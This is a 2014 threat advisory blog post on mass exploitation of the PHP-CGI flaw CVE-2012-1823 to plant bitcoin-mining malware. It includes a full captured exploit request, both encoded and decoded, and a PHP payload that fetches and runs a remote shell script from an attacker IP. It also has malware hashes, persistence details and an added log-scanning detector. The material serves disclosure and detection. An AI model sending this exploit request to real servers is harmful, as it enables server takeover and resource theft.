
PHP Inclusion Activity

Created: 06 Jan 2014 • Updated: 07 Jan 2014
Author: MSS Global Threat Response

Since the 14th of December, the SOC has noticed a substantial increase in the quantity of PHP code inclusion attacks against MSS customers. Specifically, attempts to compromise and infect internet-facing webservers by injecting malicious PHP code have been observed. While the primary vulnerability being targeted (CVE-2012-1823) isn’t new, a significant uptick in attempts to exploit it is worthy of note. Proof of concept exploit code has been publicly available for some time. At this time, it appears that only Linux webservers running out of date versions of PHP are vulnerable.

[Image: php-attack-blog-1.png]

At the time of this post, more than sixty SOC customers have been affected by these exploit attempts. There is no clear correlation between this activity and any individual industry vertical, with customers in health, financial, telecommunications, local government, and more being affected.

The main driver behind these exploits is to compromise and infect the victim webserver for financial gain. Binaries were extracted from the malicious servers utilized in the attack, revealing primarily bitcoin mining malware. Bitcoin is a virtual currency generated by performing computationally intensive operations, known as ‘mining’, on computer hardware. Attackers often infect machines with the intent of using them to generate bitcoins for financial gain.

More than 1,000 sources have been observed participating in this exploit activity since the initial increase was noted. There’s no clear trend or geographic breakdown of source addresses that would lend itself to attribution. Due to the nature of the attack, return traffic to the source host is not required. Redirection information is contained in the original exploit attempt, leading us to believe that source IP information has been spoofed. Identical exploit strings have been observed from numerous source addresses, further indicating spoofed activity.

Analysis:

Below is an example of one of several observed packages surrounding these exploit attempts. Other samples encountered during our research perform similar actions.

Example inbound traffic

POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: [victim server IP]
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Connection: close

<?php system("wget http://74.208.228[.]113/a  -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh");

Translation

  1. A percent-encoded POST request is sent to the victim server to exploit the vulnerability; the request body contains PHP that runs shell commands.
  • Decoded POST:

POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

  Because the query string contains no unencoded "=", a vulnerable php-cgi build receives it as command-line options rather than as a query: the "-d" switches override php.ini directives (disabling safe mode and function restrictions), "-n" skips php.ini entirely, and "-d auto_prepend_file=php://input" makes PHP execute the POST body itself as a script.

  2. The injected commands (if successfully executed by the victim server) download, execute, and subsequently delete a malicious script designed to infect the victim.
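As an added illustration (not code from the original post), the following Python decodes a request line the way a CGI front end would and flags the php-cgi argument-injection pattern shown above. The log lines are constructed; the first reproduces the encoded query from this post, split into chunks for readability.

```python
import re
import urllib.parse

# Constructed samples: the encoded query quoted in this post, plus benign/variant lines.
PAGE_ENCODED_QUERY = (
    "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E"
    "+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22"
    "+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30"
    "+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30"
    "+%2D%6E"
)
SAMPLE_LOG = [
    f"POST /cgi-bin/php.cgi?{PAGE_ENCODED_QUERY} HTTP/1.1",
    "GET /index.php?id=42&page=-d HTTP/1.1",            # unencoded '=': ordinary query
    "GET /cgi-bin/php.cgi?-d+allow_url_include%3Don HTTP/1.1",
    "GET /about.html HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(\S+)\s+(\S+)\s+HTTP/\d\.\d$")

def check_request(line: str) -> dict:
    """Classify one request line. Per RFC 3875 a query string with no unencoded '='
    is passed to the CGI script as argv, which is how php-cgi sees '-d' and '-n'."""
    result = {"suspicious": False, "decoded": "", "directives": [], "reasons": []}
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return result
    target = m.group(2)
    _, _, raw_query = target.partition("?")
    if not raw_query or "=" in raw_query:
        return result                       # empty or ordinary key=value query
    decoded = urllib.parse.unquote_plus(raw_query)   # '+' -> space, %XX -> char
    result["decoded"] = decoded
    tokens = decoded.split()
    if not tokens or not tokens[0].startswith("-"):
        return result
    result["suspicious"] = True
    result["reasons"].append("argv-style query: no unencoded '=' and leading '-'")
    for i, tok in enumerate(tokens):
        if tok == "-d" and i + 1 < len(tokens):       # php.ini directive override
            name, _, value = tokens[i + 1].partition("=")
            result["directives"].append(name)
            if name == "auto_prepend_file" and value == "php://input":
                result["reasons"].append("auto_prepend_file=php://input: POST body executed as PHP")
    return result
```

Running `check_request` over a web-server access log surfaces the decoded options, so an analyst can see exactly which php.ini directives an attempt tried to override.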

At this point, the following files are downloaded and various steps are taken on the system. These steps include execution of additional malware (ELF executables), the addition of a cron job to ensure some form of persistence, and various process and file maintenance actions.

File Name   MD5                               Description
a           d3754d4869164df4a6307d48d30752e6  Shell script, initial activity
update      7bb7dc624a19ed58fa9a0fdb30752098  Shell script, update routine
sh          83aa145f8b12365ca7ce37f0b03bf745  Bitcoin miner/trojan
clamav      8bcf90e5f865acd004a43f2ba891534b  Bitcoin miner/trojan

VirusTotal Anti-Virus Detect Rate

File Name   MD5                               Detect Rate
sh          83aa145f8b12365ca7ce37f0b03bf745  6/49
clamav      8bcf90e5f865acd004a43f2ba891534b  11/49

[Image: php-attack-blog-2.png]

A list of the files retrieved in this particular PHP exploit along with details and MD5 hashes.

[Image: php-attack-blog-3.png]

The initial redirect contained inside the exploit leads to this script, which is downloaded and executed if the victim machine is vulnerable. This process sets up an “update” cron job (see below) and downloads and executes the core Bitcoin mining binaries. Notice the traffic to port 3333/TCP: this is Stratum, the mining-pool protocol widely used by Bitcoin miners.

[Image: php-attack-blog-4.png]

Contents of the “update” script. This process attempts to maintain persistence on the victim machine by re-running the initial “a” script if an existing malicious connection isn’t already open.

Impact and MSS detection:

At first glance, the intent of this exploit and infection activity isn’t to damage or steal information from victim webservers. The role of Bitcoin mining in this scenario is to harness the victim’s computational resources to financially benefit the perpetrators. The victim systems in this situation have been wrongfully hijacked and pressed into service, which may cause slowdowns for legitimate users and resource issues for server owners. Due to the persistent nature and continuous “phone home” tendencies of these infections, additional malicious action could be taken on infected machines in the future.

We believe the activity highlighted in this report is related to a worm detailed in the following Symantec write-up: http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices

Currently, MSS has coverage for this initial exploit activity via most IDS vendors, including Sourcefire, Cisco, Palo Alto, Emerging Threats, and more. Based on samples extracted and observed infections, additional post-compromise IP and URL based MSS signatures are in place across our entire customer base. At this stage, customers will be alerted to both exploit and compromise activity.